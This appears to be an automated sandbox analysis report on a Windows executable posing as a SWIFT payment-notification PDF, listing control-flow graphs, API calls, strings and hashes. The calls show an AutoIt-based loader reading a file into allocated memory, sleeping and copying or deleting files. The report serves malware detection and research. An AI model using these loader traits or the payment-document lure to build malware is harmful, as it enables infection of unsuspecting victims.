                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                                                              • String ID: #$0$AutoIt v3
                                                                                                                              • API String ID: 423443420-4155596026
                                                                                                                              • Opcode ID: c82d51e411665b6a3a3e76d1a8d87b49acf25a0f72c8993ed2556b78267af7e8
                                                                                                                              • Instruction ID: fa3beea58d24b169a793a749875a715f65b9999dd8e8f54869ce90ead7ff89b0
                                                                                                                              • Opcode Fuzzy Hash: c82d51e411665b6a3a3e76d1a8d87b49acf25a0f72c8993ed2556b78267af7e8
                                                                                                                              • Instruction Fuzzy Hash: 31212AB1E55214AFD720DFA9ED45B9EBBB8BB4C700F00447AFA08A7290D7B559408B98

                                                                                                                              Control-flow Graph

                                                                                                                              APIs
                                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe,00000104,?), ref: 00401F4C
                                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe,00000104), ref: 00428B5B
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: FileModuleName
                                                                                                                              • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe$CMDLINE$CMDLINERAW
                                                                                                                              • API String ID: 514040917-1334868577
                                                                                                                              • Opcode ID: fc6f6475a80a7344a840dcdaee6076005090c92f926202b5f3dea37786da349d
                                                                                                                              • Instruction ID: a67d1fff980de619c7b08a01c822048bbc87f212fdb5160913ca6de555091b2a
                                                                                                                              • Opcode Fuzzy Hash: fc6f6475a80a7344a840dcdaee6076005090c92f926202b5f3dea37786da349d
                                                                                                                              • Instruction Fuzzy Hash: 0E718571D0021A9ACB10EBA1DD456EE7774AF54308F40843FF905772D1EBBC6A49CB99
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: Default
                                                                                                                              • API String ID: 0-753088835
                                                                                                                              • Opcode ID: 82a21429777c70c89858f349e007f5803818975d54e1b7a66e487d92d634b65a
                                                                                                                              • Instruction ID: a673259d86369fb9501a746496732cc59a2062e12c9a0651055f0cdb6904a52b
                                                                                                                              • Opcode Fuzzy Hash: 82a21429777c70c89858f349e007f5803818975d54e1b7a66e487d92d634b65a
                                                                                                                              • Instruction Fuzzy Hash: 13729DB06043019FD714DF25D481A2BB7E5EF85314F14882EE986AB391D738EC56CB9B
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 0217f7cfd90474559fc4cb61afebdb5e56dae043fd45716d0186f1f44528bfb0
                                                                                                                              • Instruction ID: 1555620249d9bca8109bc9dac4b4fb45b2a7888f9a4ed29ad5b0dea482c9f251
                                                                                                                              • Opcode Fuzzy Hash: 0217f7cfd90474559fc4cb61afebdb5e56dae043fd45716d0186f1f44528bfb0
                                                                                                                              • Instruction Fuzzy Hash: 1412D5B0E043859FDB259F68C8847FE7BF0AF06304F14459AE4528B292D37C99C2CB5A

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 2378 401100-401111 2379 401113-401119 2378->2379 2380 401179-401180 2378->2380 2381 401144-40114a 2379->2381 2382 40111b-40111e 2379->2382 2380->2379 2383 401182 2380->2383 2386 401184-40118e call 401250 2381->2386 2387 40114c-40114f 2381->2387 2382->2381 2385 401120-401126 2382->2385 2384 40112c-401141 DefWindowProcW 2383->2384 2385->2384 2389 42b038-42b03f 2385->2389 2392 401193-40119a 2386->2392 2390 401151-401157 2387->2390 2391 40119d 2387->2391 2389->2384 2397 42b045-42b059 call 401000 call 40e0c0 2389->2397 2395 401219-40121f 2390->2395 2396 40115d 2390->2396 2393 4011a3-4011a9 2391->2393 2394 42afb4-42afc5 call 40f190 2391->2394 2393->2385 2398 4011af 2393->2398 2394->2392 2395->2385 2401 401225-42b06d call 468b0e 2395->2401 2399 401163-401166 2396->2399 2400 42b01d-42b024 2396->2400 2397->2384 2398->2385 2405 4011b6-4011d8 KillTimer call 401000 PostQuitMessage 2398->2405 2406 4011db-401202 SetTimer RegisterWindowMessageW 2398->2406 2408 42afe9-42b018 call 40f190 call 401a50 2399->2408 2409 40116c-401172 2399->2409 2400->2384 2407 42b02a-42b033 call 4370f4 2400->2407 2401->2392 2406->2392 2416 401204-401216 CreatePopupMenu 2406->2416 2407->2384 2408->2384 2409->2385 2418 401174-42afde call 45fd57 2409->2418 2418->2384 2429 42afe4 2418->2429 2429->2392
                                                                                                                              APIs
                                                                                                                              • DefWindowProcW.USER32(?,?,?,?,?,?,?,004010F8,?,?,?), ref: 00401136
                                                                                                                              • KillTimer.USER32(?,00000001,?), ref: 004011B9
                                                                                                                              • PostQuitMessage.USER32(00000000), ref: 004011CB
                                                                                                                              • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 004011E5
                                                                                                                              • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,004010F8,?,?,?), ref: 004011F0
                                                                                                                              • CreatePopupMenu.USER32 ref: 00401204
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                                                              • String ID: TaskbarCreated
                                                                                                                              • API String ID: 129472671-2362178303
                                                                                                                              • Opcode ID: 3a68920b2457bf0ecdafc1b2be4b40edda77bb20db2372f596e363752a538359
                                                                                                                              • Instruction ID: c871ea33cf18a3cc9178abcaf30b48d6b70312a550ef0fd47f6a389c1f0ea6f4
                                                                                                                              • Opcode Fuzzy Hash: 3a68920b2457bf0ecdafc1b2be4b40edda77bb20db2372f596e363752a538359
                                                                                                                              • Instruction Fuzzy Hash: 1E417932B0420497DB28DB68EC85BBE3355E759320F10493FFA11AB6F1C67D9850879E

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 2430 4122638-41226e6 call 4120048 2433 41226ed-4122713 call 4123548 CreateFileW 2430->2433 2436 4122715 2433->2436 2437 412271a-412272a 2433->2437 2438 4122865-4122869 2436->2438 2442 4122731-412274b VirtualAlloc 2437->2442 2443 412272c 2437->2443 2440 41228ab-41228ae 2438->2440 2441 412286b-412286f 2438->2441 2444 41228b1-41228b8 2440->2444 2445 4122871-4122874 2441->2445 2446 412287b-412287f 2441->2446 2449 4122752-4122769 ReadFile 2442->2449 2450 412274d 2442->2450 2443->2438 2451 41228ba-41228c5 2444->2451 2452 412290d-4122922 2444->2452 2445->2446 2447 4122881-412288b 2446->2447 2448 412288f-4122893 2446->2448 2447->2448 2455 41228a3 2448->2455 2456 4122895-412289f 2448->2456 2457 4122770-41227b0 VirtualAlloc 2449->2457 2458 412276b 2449->2458 2450->2438 2459 41228c7 2451->2459 2460 41228c9-41228d5 2451->2460 2453 4122932-412293a 2452->2453 2454 4122924-412292f VirtualFree 2452->2454 2454->2453 2455->2440 2456->2455 2461 41227b2 2457->2461 2462 41227b7-41227d2 call 4123798 2457->2462 2458->2438 2459->2452 2463 41228d7-41228e7 2460->2463 2464 41228e9-41228f5 2460->2464 2461->2438 2470 41227dd-41227e7 2462->2470 2466 412290b 2463->2466 2467 4122902-4122908 2464->2467 2468 41228f7-4122900 2464->2468 2466->2444 2467->2466 2468->2466 2471 412281a-412282e call 41235a8 2470->2471 2472 41227e9-4122818 call 4123798 2470->2472 2478 4122832-4122836 2471->2478 2479 4122830 2471->2479 2472->2470 2480 4122842-4122846 2478->2480 2481 4122838-412283c CloseHandle 2478->2481 2479->2438 2482 4122856-412285f 2480->2482 2483 4122848-4122853 VirtualFree 2480->2483 2481->2480 2482->2433 2482->2438 2483->2482
                                                                                                                              APIs
                                                                                                                              • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 04122709
                                                                                                                              • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0412292F
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.911854996.0000000004120000.00000040.00000020.00020000.00000000.sdmp, Offset: 04120000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_4120000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CreateFileFreeVirtual
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 204039940-0
                                                                                                                              • Opcode ID: d349c2c11462b54f33c86561be68849ac3e84e681e3d8bb3fdc8e10bc75df865
                                                                                                                              • Instruction ID: 518e08dee904c539c06a7b44f1eaab17f36de3c8d938e0501593c62b37ab75af
                                                                                                                              • Opcode Fuzzy Hash: d349c2c11462b54f33c86561be68849ac3e84e681e3d8bb3fdc8e10bc75df865
                                                                                                                              • Instruction Fuzzy Hash: B7A10874E40229EBDB14CFA4C994BEEB7B5BF48304F208199E611BB280D779AA51CF54

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 2484 40e4c0-40e4e5 call 403350 RegOpenKeyExW 2487 427190-4271ae RegQueryValueExW 2484->2487 2488 40e4eb-40e4f0 2484->2488 2489 4271b0-4271f5 call 4115d7 call 43652f RegQueryValueExW 2487->2489 2490 42721a-42722a RegCloseKey 2487->2490 2495 427210-427219 call 436508 2489->2495 2496 4271f7-42720e call 402160 2489->2496 2495->2490 2496->2495
                                                                                                                              APIs
                                                                                                                              • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,?,?,0040E4A1), ref: 0040E4DD
                                                                                                                              • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,0040E4A1,00000000,?,?,?,0040E4A1), ref: 004271A6
                                                                                                                              • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,0040E4A1,?,00000000,?,?,?,?,0040E4A1), ref: 004271ED
                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?,?,0040E4A1), ref: 0042721E
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: QueryValue$CloseOpen
                                                                                                                              • String ID: Include$Software\AutoIt v3\AutoIt
                                                                                                                              • API String ID: 1586453840-614718249
                                                                                                                              • Opcode ID: 745ef64aa2fbb9668b51d20dc45e3911ec94e57b8678bed3badf0bc954fa3e05
                                                                                                                              • Instruction ID: d6672e68ffeed78ba434be4ce119fa1e10800d5a5bf196f8e2f41644cb46c1f5
                                                                                                                              • Opcode Fuzzy Hash: 745ef64aa2fbb9668b51d20dc45e3911ec94e57b8678bed3badf0bc954fa3e05
                                                                                                                              • Instruction Fuzzy Hash: CF21D871780204BBDB14EBF4ED46FAF737CEB54700F10055EB605E7281EAB5AA008768

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 2501 410570-4105f1 CreateWindowExW * 2 ShowWindow * 2
                                                                                                                              APIs
                                                                                                                              • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 004105A5
                                                                                                                              • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 004105CE
                                                                                                                              • ShowWindow.USER32(?,00000000), ref: 004105E4
                                                                                                                              • ShowWindow.USER32(?,00000000), ref: 004105EE
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Window$CreateShow
                                                                                                                              • String ID: AutoIt v3$edit
                                                                                                                              • API String ID: 1584632944-3779509399
                                                                                                                              • Opcode ID: b28a7d78b19f48c216133de275d8b0452446851dd496b073adb1022152ad6d67
                                                                                                                              • Instruction ID: 021b1916d714280a6beb379f8f8b29d81737bdb93309e58067b2166fb7f1837a
                                                                                                                              • Opcode Fuzzy Hash: b28a7d78b19f48c216133de275d8b0452446851dd496b073adb1022152ad6d67
                                                                                                                              • Instruction Fuzzy Hash: 29F01771BE43107BF6B0A764AC43F5A2698A758F65F31083BB700BB5D0E1E4B8408B9C

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 2502 41223f8-412253a call 4120048 call 41222e8 CreateFileW 2509 4122541-4122551 2502->2509 2510 412253c 2502->2510 2513 4122553 2509->2513 2514 4122558-4122572 VirtualAlloc 2509->2514 2511 41225f1-41225f6 2510->2511 2513->2511 2515 4122576-412258d ReadFile 2514->2515 2516 4122574 2514->2516 2517 4122591-41225cb call 4122328 call 41212e8 2515->2517 2518 412258f 2515->2518 2516->2511 2523 41225e7-41225ef ExitProcess 2517->2523 2524 41225cd-41225e2 call 4122378 2517->2524 2518->2511 2523->2511 2524->2523
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 041222E8: Sleep.KERNELBASE(000001F4), ref: 041222F9
                                                                                                                              • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 04122530
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.911854996.0000000004120000.00000040.00000020.00020000.00000000.sdmp, Offset: 04120000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_4120000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CreateFileSleep
                                                                                                                              • String ID: QN772L3YKYANVPX
                                                                                                                              • API String ID: 2694422964-496130914
                                                                                                                              • Opcode ID: 6ff7ffbca7ab6eed8deb5f288e7801dfe7d92491805c66cf5e0b2cf85bd6fbe5
                                                                                                                              • Instruction ID: ece7e51a32f6f887684f306461f2a0d0457bad64dc72ab1f23430b3c64d50ec2
                                                                                                                              • Opcode Fuzzy Hash: 6ff7ffbca7ab6eed8deb5f288e7801dfe7d92491805c66cf5e0b2cf85bd6fbe5
                                                                                                                              • Instruction Fuzzy Hash: 4C519230E04259EBEF11DBE4C854BEEBB79AF18300F008199E609BB2C0D7B95B45CB65

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 2526 40f250-40f26f RegOpenKeyExW 2527 425e17-425e1c 2526->2527 2528 40f275-40f296 RegQueryValueExW 2526->2528 2529 40f2c3-40f2d6 RegCloseKey 2528->2529 2530 40f298-40f2a3 2528->2530 2531 40f2a9-40f2c2 RegCloseKey 2530->2531 2532 425e1d-425e1f 2530->2532
                                                                                                                              APIs
                                                                                                                              • RegOpenKeyExW.KERNELBASE(00000004,Control Panel\Mouse,00000000,00000001,00000004,00000004), ref: 0040F267
                                                                                                                              • RegQueryValueExW.KERNELBASE(00000000,?,00000000,00000000,?,?,00000002,00000000), ref: 0040F28E
                                                                                                                              • RegCloseKey.KERNELBASE(?), ref: 0040F2B5
                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 0040F2C9
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Close$OpenQueryValue
                                                                                                                              • String ID: Control Panel\Mouse
                                                                                                                              • API String ID: 1607946009-824357125
                                                                                                                              • Opcode ID: 0a2ddf5dd10fc63f6e19eedc2563a5e53f3783e3c799d68c1c3a3a1866560054
                                                                                                                              • Instruction ID: a31ac2e1b7deaa2d1d9e7506379341dce8fcd1dacbe24dc49005ae4a0027d3ba
                                                                                                                              • Opcode Fuzzy Hash: 0a2ddf5dd10fc63f6e19eedc2563a5e53f3783e3c799d68c1c3a3a1866560054
                                                                                                                              • Instruction Fuzzy Hash: 91118C76640108AFCB10CFA8ED459EFB7BCEF59300B1089AAF908C3210E6759A11DBA4

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 2533 452ac7-452b53 call 422240 call 442c5a call 4150d1 call 41313c 2542 452c30-452c3a call 452719 2533->2542 2543 452b59-452b6a call 452719 2533->2543 2547 452c3f-452c41 2542->2547 2548 452b6c-452b77 2543->2548 2549 452b7a-452c2e call 413a0e call 411567 call 411536 call 413a0e call 411536 * 2 2543->2549 2547->2548 2550 452c47-452d18 call 414d04 * 8 call 431e1f call 4149c2 2547->2550 2549->2550 2583 452d28-452d43 call 442bb4 2550->2583 2584 452d1a-452d25 2550->2584 2587 452de2-452df7 call 414a46 2583->2587 2588 452d49 2583->2588 2594 452e15-452e1a 2587->2594 2595 452df9-452e12 DeleteFileW 2587->2595 2590 452d51-452d59 2588->2590 2592 452d5f 2590->2592 2593 452d5b-452d5d 2590->2593 2596 452d64-452d86 call 414d04 2592->2596 2593->2596 2597 452ea6-452ebb CopyFileW 2594->2597 2598 452e20-452e81 call 431e9e call 431e71 call 44b1a9 2594->2598 2605 452da9-452dcc call 432229 call 4142b6 2596->2605 2606 452d88-452da7 call 442c29 2596->2606 2602 452ebd-452ed6 DeleteFileW 2597->2602 2603 452ed9-452ef5 DeleteFileW call 431ddb 2597->2603 2617 452e86-452e88 2598->2617 2608 452efa-452f02 2603->2608 2618 452dd1-452ddc 2605->2618 2606->2605 2617->2603 2619 452e8a-452ea3 DeleteFileW 2617->2619 2618->2587 2620 452d4b-452d4d 2618->2620 2620->2590
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 4aa980205917272296e4afef82bb8be55a9c40817262f903344c4726eeabf687
                                                                                                                              • Instruction ID: 04d0e47ed4a2b248740d2851a73093f1b496c65d3ae4d984919b8c0089c9d159
                                                                                                                              • Opcode Fuzzy Hash: 4aa980205917272296e4afef82bb8be55a9c40817262f903344c4726eeabf687
                                                                                                                              • Instruction Fuzzy Hash: 6FC14EB2508340ABD720DF65D881EEFB7E8EFC9704F40492FF68987241E6759548CB66

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 2621 4102b0-4102c5 SHGetMalloc 2622 4102cb-4102da SHGetDesktopFolder 2621->2622 2623 425dfd-425e0e call 433244 2621->2623 2624 4102e0-41031a call 412fba 2622->2624 2625 41036b-410379 2622->2625 2633 410360-410368 2624->2633 2634 41031c-410331 SHGetPathFromIDListW 2624->2634 2625->2623 2631 41037f-410384 2625->2631 2633->2625 2635 410351-41035d 2634->2635 2636 410333-41034a call 412fba 2634->2636 2635->2633 2636->2635
                                                                                                                              APIs
                                                                                                                              • SHGetMalloc.SHELL32(0040F54C), ref: 004102BD
                                                                                                                              • SHGetDesktopFolder.SHELL32(?,004A90E8), ref: 004102D2
                                                                                                                              • SHGetPathFromIDListW.SHELL32(?,?), ref: 00410327
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
